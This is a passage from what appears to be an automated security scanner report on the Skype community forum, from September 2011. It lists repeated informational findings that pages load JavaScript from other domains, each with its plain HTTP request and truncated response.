...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/AA2312F60BA29D0BF8D88F1980CD8BE6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.165. http://community.skype.com/t5/Les-produits-et-services-Skype/bd-p/fr_products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Les-produits-et-services-Skype/bd-p/fr_products

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Les-produits-et-services-Skype/bd-p/fr_products HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:09 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.166. http://community.skype.com/t5/Linux/Google-Chrome-OS/m-p/133556  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Linux/Google-Chrome-OS/m-p/133556

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Linux/Google-Chrome-OS/m-p/133556 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:43 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 140959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.167. http://community.skype.com/t5/Linux/bd-p/Linux  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Linux/bd-p/Linux

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Linux/bd-p/Linux HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 186577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.168. http://community.skype.com/t5/Mac/Multiple-Skype-phone-numbers-how-can-I-forward-calls-to-ONLY-one/m-p/133784  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Mac/Multiple-Skype-phone-numbers-how-can-I-forward-calls-to-ONLY-one/m-p/133784

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Mac/Multiple-Skype-phone-numbers-how-can-I-forward-calls-to-ONLY-one/m-p/133784 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.169. http://community.skype.com/t5/Mac/OS-X-LION-Skype-5-2-BIIIIIG-PROBLEMS-Be-aware/m-p/134122  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Mac/OS-X-LION-Skype-5-2-BIIIIIG-PROBLEMS-Be-aware/m-p/134122

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Mac/OS-X-LION-Skype-5-2-BIIIIIG-PROBLEMS-Be-aware/m-p/134122 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.170. http://community.skype.com/t5/Mac/bd-p/Mac  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Mac/bd-p/Mac

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Mac/bd-p/Mac HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.171. http://community.skype.com/t5/Mobile/ct-p/Mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Mobile/ct-p/Mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Mobile/ct-p/Mobile HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:43 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 123148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.172. http://community.skype.com/t5/My-Account/ct-p/Account  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/My-Account/ct-p/Account

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/My-Account/ct-p/Account HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.173. http://community.skype.com/t5/Other-devices/GE-31591/m-p/133990  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Other-devices/GE-31591/m-p/133990

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Other-devices/GE-31591/m-p/133990 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 164119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.174. http://community.skype.com/t5/Other-devices/bd-p/Mobile_other  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Other-devices/bd-p/Mobile_other

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Other-devices/bd-p/Mobile_other HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 191673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.175. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:16 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 176127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.176. http://community.skype.com/t5/Payments-and-Billing/Account-blocked/m-p/132180  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Payments-and-Billing/Account-blocked/m-p/132180

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Payments-and-Billing/Account-blocked/m-p/132180 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.177. http://community.skype.com/t5/Payments-and-Billing/bd-p/Payments_and_Billing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Payments-and-Billing/bd-p/Payments_and_Billing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Payments-and-Billing/bd-p/Payments_and_Billing HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 197341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.178. http://community.skype.com/t5/PortuguĂŞs/ct-p/pt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Portugu..s/ct-p/pt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Portugu..s/ct-p/pt HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:10 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 126406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.179. http://community.skype.com/t5/Public-API/Here-are-Workarounds-for-the-Skype4COM-Issues/m-p/133974  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Public-API/Here-are-Workarounds-for-the-Skype4COM-Issues/m-p/133974

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Public-API/Here-are-Workarounds-for-the-Skype4COM-Issues/m-p/133974 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 151021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.180. http://community.skype.com/t5/Public-API/bd-p/Public_API  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Public-API/bd-p/Public_API

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Public-API/bd-p/Public_API HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 212008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.181. http://community.skype.com/t5/Págos-CrĂ©dito-formas-de-pago/bd-p/es_payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/P..gos-Cr..dito-formas-de-pago/bd-p/es_payment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/P..gos-Cr..dito-formas-de-pago/bd-p/es_payment HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
